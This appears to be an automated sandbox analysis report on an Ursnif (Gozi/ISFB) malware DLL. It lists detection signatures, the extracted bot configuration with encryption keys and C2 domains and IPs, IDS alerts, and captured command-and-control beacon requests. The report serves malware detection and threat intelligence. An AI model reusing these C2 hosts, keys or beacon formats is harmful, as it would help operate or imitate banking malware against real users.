Windows Analysis Report
hFGZpat9Mf.dll

Overview

General Information

Sample Name: hFGZpat9Mf.dll
Analysis ID: 560543
MD5: 9acde2c3e3a375590a1bc716eabc52c5
SHA1: e231c9ae802a9aad9916f08256f7558f531d54ce
SHA256: 57f997217db22a4d97700768189d44034303e3b15dc08fa48ed6b91bd7051c05
Tags: dllGoziISFBUrsnif
Infos:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Writes or reads registry keys via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Found evasive API chain (may stop execution after checking system information)
Sigma detected: Suspicious Call by Ordinal
Writes registry values via WMI
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Contains functionality to record screenshots
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection
barindex
Found malware configuration
Source: 00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Ursnif {"RSA Public Key": "a/OOe3vutyE+gNUF58s+932DNMr8fczoarMUDWqkJsUgObu+3KDuWCwO4VJi2nQNFoXQ13xL3U4zAT7teC979D2YSjTERxwWBeeP0HeZqNq0qcAgYIwsDRVFhGgIWRlndn894LdhC+W8uyATPg1or5n2yZWlh+/NEBJX1nFopQ/z09NIGZPpSgelgd7Gl3dRww5rEsR2WK4eL7TmnaoLNu6StWcVsJ2/hdx1IvAw+0FHXO2OQVeCIyD0YqFOgVX4yIlMXSNJExST4L1Wc5wBukAkkdIxFsm7gsamW82tEhFe2W5TqQV7VVRxRARRhHVoEwzsqj+Q49089Kkixnoy1HXPNrN04rhNhyDNba5DkKY=", "c2_domain": ["config.edge.skype.com", "194.76.226.200", "giporedtrip.at", "habpfans.at", "31.214.157.187"], "botnet": "3000", "server": "50", "serpent_key": "YFyLBjaJo8V90gKm", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
Multi AV Scanner detection for submitted file
Source: hFGZpat9Mf.dll Virustotal: Detection: 20% Perma Link
Source: hFGZpat9Mf.dll ReversingLabs: Detection: 32%
Antivirus detection for URL or domain
Source: http://habpfans.at/drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/VN2ToaIYsZPU/kI1do_2B9jW/Q9gfyv85CoHPvT/SnqcLw3TTcQW61PNrLWiv/_2BkKhdRaMJkT9HD/82Fg3tERnOrn6Yg/fT2SNRr4ih8M1B9lEq/WIX8riitn/8yNrCBKJNgpm3khA4gSx/B8X3zDAJaQCYV1F4k99/jQHMcxYL/Il8wT6lWu/Ih.jlk Avira URL Cloud: Label: malware
Source: http://giporedtrip.at/drew/vDXEGqf4EaI6e/GBZCusNA/wGFZ17UZEew5_2F3lztpfux/SlqAMrP7W1/XBD36Fnf1Eq7wA6HD/bZQhlGWv2oMx/02wZPYg1S9_/2FsBPVVzIGiliu/ZgesoO3_2BU1Itp9mWBBQ/zS9Fa06G7Ifi1Qdi/yVB_2BRlu8Zp_2B/LJtKQv4YtcqH6IAzxR/L6Ho0ZvfB/evXUKtmzU_2B4Fe1cs5B/1wJA25jdSjnKCVAyqP7/xAdhGKLVvM/CvkvXIJYGs/9.jlk Avira URL Cloud: Label: malware
Source: http://habpfans.at/ Avira URL Cloud: Label: malware
Source: http://habpfans.at/drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/w Avira URL Cloud: Label: malware
Source: http://giporedtrip.at/drew/CNAO_2FMqt2bQnnFTS9A/gZCx4lwGHYQjpKz_2Bo/eC3Q_2B6RQnBEorg_2FJk6/uEN67LHG_2FS5/_2BBd1X9/aVPauq0optO45rzbpdCQm0T/aYIRRNsEBo/KjgLaOYvR_2BgwzfQ/25S5OlQYXnss/XWKrlvnyLdL/zvJbW2nKGtMp_2/BhAqVJaOXmJzkoWYA4_2B/1sUQfL4pghiYPQ_2/Bk4zNXCpOm9uy6W/_2FwvvWoJCQywtXfuj/zSz8jbk7z4_2FaKsy/ujc.jlk Avira URL Cloud: Label: malware
Source: http://habpfans.at/drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/wLkUkA7sRnm/cso3yuTSujNtgI/CMmvYVa7e4KaoltzEmBTc/sgUl10rzE9jSORq1/rqqMvEmtzS52b3S/MwqSqUIn0qJ41lN07l/ltNVceIDT/qjCtCMmp_2FbkkqAoDDI/2nZPBTOmmpjaMrj1ust/QMCPjE0wKPGXBQrFS0WE_2/B3SVbiens/K.jlk Avira URL Cloud: Label: malware
Source: http://habpfans.at/drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/ Avira URL Cloud: Label: malware
Source: http://habpfans.at/g Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: giporedtrip.at Virustotal: Detection: 11% Perma Link
Source: habpfans.at Virustotal: Detection: 11% Perma Link
Machine Learning detection for sample
Source: hFGZpat9Mf.dll Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 3.0.rundll32.exe.1080000.3.unpack Avira: Label: TR/Crypt.XPACK.Gen8
Source: 0.2.loaddll32.exe.890184.1.unpack Avira: Label: TR/Kazy.4159236
Source: 3.0.rundll32.exe.ed0184.5.unpack Avira: Label: TR/Kazy.4159236
Source: 3.0.rundll32.exe.ed0184.1.unpack Avira: Label: TR/Kazy.4159236
Source: 3.2.rundll32.exe.1080000.3.unpack Avira: Label: TR/Crypt.XPACK.Gen8
Source: 0.2.loaddll32.exe.9e0000.3.unpack Avira: Label: TR/Crypt.XPACK.Gen8
Source: 3.0.rundll32.exe.1080000.7.unpack Avira: Label: TR/Crypt.XPACK.Gen8
Source: 3.2.rundll32.exe.ed0184.1.unpack Avira: Label: TR/Kazy.4159236

Compliance
barindex
Uses 32bit PE files
Source: hFGZpat9Mf.dll Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.261009852.0000000004A6B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: advapi32.pdbl source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: version.pdb` source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mpr.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: setupapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: shcore.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winspool.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: shell32.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: oleaut32.pdbv source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: version.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wsspicli.pdbj source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: powrprof.pdbr source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rundll32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sfc.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: comctl32v582.pdbg source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007053C4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 0_2_007053C4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E153C4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 3_2_00E153C4

Networking
barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49753 -> 13.107.42.16:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49758 -> 194.76.226.200:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49771 -> 211.119.84.112:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49771 -> 211.119.84.112:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49781 -> 41.41.255.235:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49812 -> 31.214.157.187:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49812 -> 31.214.157.187:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49814 -> 13.107.43.16:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49825 -> 181.129.180.251:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49827 -> 61.36.14.230:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49828 -> 31.214.157.187:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49829 -> 13.107.43.16:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49829 -> 13.107.43.16:80
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: EPMTelecomunicacionesSAESPCO EPMTelecomunicacionesSAESPCO
Source: Joe Sandbox View ASN Name: TE-ASTE-ASEG TE-ASTE-ASEG
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 181.129.180.251 181.129.180.251
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /drew/ozC7eSUmzahvYkYKrp/EnTXsLZQu/ZxwfzvyOea6Ms_2FcWiK/QVPuXmRecwMBmPtS2pP/K1YuqB0TTP3PJ7dc3csdFA/1Ac_2BGJ3ahfL/ClNkrX58/ZDofYbeDbIVvrUisO8PwbQv/pc3vAH6GWF/x_2B4_2BbH_2B0wxz/YCHkmZmDbaCX/aMf9JRtYupc/_2Ben2gyoQcqJb/gP1jDokjfsnRCuX4LwXIc/R6CnFb_2FUwS1dKT/G7Z9QUvFXshW5HS/y.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic HTTP traffic detected: GET /drew/CNAO_2FMqt2bQnnFTS9A/gZCx4lwGHYQjpKz_2Bo/eC3Q_2B6RQnBEorg_2FJk6/uEN67LHG_2FS5/_2BBd1X9/aVPauq0optO45rzbpdCQm0T/aYIRRNsEBo/KjgLaOYvR_2BgwzfQ/25S5OlQYXnss/XWKrlvnyLdL/zvJbW2nKGtMp_2/BhAqVJaOXmJzkoWYA4_2B/1sUQfL4pghiYPQ_2/Bk4zNXCpOm9uy6W/_2FwvvWoJCQywtXfuj/zSz8jbk7z4_2FaKsy/ujc.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: giporedtrip.at
Source: global traffic HTTP traffic detected: GET /drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/wLkUkA7sRnm/cso3yuTSujNtgI/CMmvYVa7e4KaoltzEmBTc/sgUl10rzE9jSORq1/rqqMvEmtzS52b3S/MwqSqUIn0qJ41lN07l/ltNVceIDT/qjCtCMmp_2FbkkqAoDDI/2nZPBTOmmpjaMrj1ust/QMCPjE0wKPGXBQrFS0WE_2/B3SVbiens/K.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: habpfans.at
Source: global traffic HTTP traffic detected: GET /drew/n9Q8SXORQfxecr/MW5_2Fu9_2Bgocr6670ju/D1JJTVEHrWL1TxqL/xGoJ_2FQlD36_2B/GkPBzrjzE3l7JBLY9O/1EFPlHsMW/m5HxfuFe9CAmeE3Sv9mV/WruJ_2B6bq6RWMaARg5/48WJvcYD9cWVaImnFjKYnp/qqfI438hlaFuV/Cz10Llo3/y28DCtREPMb5OZnUZKj2hAx/fvbD6E0k2X/xMHWSCI5symguz2Bp/FnCO_2F0QOq8/vwhEVJIxW/5.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 31.214.157.187
Source: global traffic HTTP traffic detected: GET /drew/t4UXVVFvbg_2F3LXo8gXBT/1icGJdsG14mTA/YOVrBwZF/xARqsNBXczJePkKt2X6ww_2/BWmoPwSUrF/dMkwNYvCaezjn8JBl/H0ytvGxBbW3l/zR2N_2BHrz_/2FvsAN_2FRzTTC/lSSKBusA2w75D7HkZKGJs/DACOMqt0XK0wSfc5/bo0iFsZeiFg2i2l/JDzyY2V7hheHpK0ocJ/ZgcshLwb0/jlOmaQmjqFbHJJo3m7Pt/o4K7mLse1jm/1K47Z.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic HTTP traffic detected: GET /drew/vDXEGqf4EaI6e/GBZCusNA/wGFZ17UZEew5_2F3lztpfux/SlqAMrP7W1/XBD36Fnf1Eq7wA6HD/bZQhlGWv2oMx/02wZPYg1S9_/2FsBPVVzIGiliu/ZgesoO3_2BU1Itp9mWBBQ/zS9Fa06G7Ifi1Qdi/yVB_2BRlu8Zp_2B/LJtKQv4YtcqH6IAzxR/L6Ho0ZvfB/evXUKtmzU_2B4Fe1cs5B/1wJA25jdSjnKCVAyqP7/xAdhGKLVvM/CvkvXIJYGs/9.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: giporedtrip.at
Source: global traffic HTTP traffic detected: GET /drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/VN2ToaIYsZPU/kI1do_2B9jW/Q9gfyv85CoHPvT/SnqcLw3TTcQW61PNrLWiv/_2BkKhdRaMJkT9HD/82Fg3tERnOrn6Yg/fT2SNRr4ih8M1B9lEq/WIX8riitn/8yNrCBKJNgpm3khA4gSx/B8X3zDAJaQCYV1F4k99/jQHMcxYL/Il8wT6lWu/Ih.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: habpfans.at
Source: global traffic HTTP traffic detected: GET /drew/XdSo6qg_2FEgYysST/WOvXNJFccrJx/zVwG0bEZwA1/FgOrwJqVq8qQMt/gJKBdkHK_2BRbM8cGXljg/dR5mjLhLFYJj3437/sCPrzkqYN8vu4UK/Lv8bHqBMBEjz1n4JUX/xuOm6McxD/U7cQGMW7Bxk_2BVYpR1Y/2dwD1RGZgWHtptGZcjA/6KkSFpd8oqg4xHg9j8CKKi/XQJvRiHHSuj0_/2BwWvoV7/60l_2BahFJ3qIHK1CvN87c7/jOCSFwu.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 31.214.157.187
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 26 Jan 2022 16:03:50 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 26 Jan 2022 16:04:12 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 